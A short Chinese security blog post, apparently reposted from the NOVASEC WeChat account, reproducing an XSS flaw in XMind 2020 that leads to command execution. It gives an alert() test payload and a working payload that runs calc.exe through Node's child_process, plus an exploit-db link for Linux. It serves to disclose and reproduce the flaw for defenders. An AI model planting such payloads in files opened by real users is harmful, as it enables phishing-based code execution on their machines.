XMIND存在XSS执行RCE漏洞

admin 2021年9月1日20:08:24评论83 views字数 629阅读2分5秒阅读模式
△△△点击上方“蓝字”关注我们了解更多精彩




0x00 Preface [前言/简介]

2021年5月10日,360漏洞云监测到Xmind 2020存在XSS漏洞,攻击者可以借助该漏洞实现命令执行,在实际环境中借助钓鱼攻击可能造成更严重的危害。

XMIND存在XSS执行RCE漏洞



0x01 复现环境

XMind 2020 202101070032(官网目前提供的下载版本)

XMIND存在XSS执行RCE漏洞

XMIND存在XSS执行RCE漏洞






0x02 漏洞复现
正常弹框payload:<img src=1 onerror=alert("1")>,注意,需要按下功能键才能触发。

XMIND存在XSS执行RCE漏洞


弹计算器payload:
<img src=# onerror="require('child_process').exec('calc.exe',null);">

XMIND存在XSS执行RCE漏洞


linux版本参考:
https://www.exploit-db.com/exploits/49827





0x03 修复建议

下载的windows版本就是最新的版本,至于修复建议,请谨慎打开xmind防止钓鱼。

参考链接:https://mp.weixin.qq.com/s/JCj4yPN5ORGt1WGc7gpuDQ


END



如您有任何投稿、问题、建议、需求、合作、后台留言NOVASEC公众号!

XMIND存在XSS执行RCE漏洞

或添加NOVASEC-MOYU 以便于及时回复。

XMIND存在XSS执行RCE漏洞


感谢大哥们的对NOVASEC的支持点赞和关注

加入我们与萌新一起成长吧!


本团队任何技术及文件仅用于学习分享,请勿用于任何违法活动,感谢大家的支持!



本文始发于微信公众号(NOVASEC):XMIND存在XSS执行RCE漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月1日20:08:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   XMIND存在XSS执行RCE漏洞http://cn-sec.com/archives/370588.html

发表评论

匿名网友 填写信息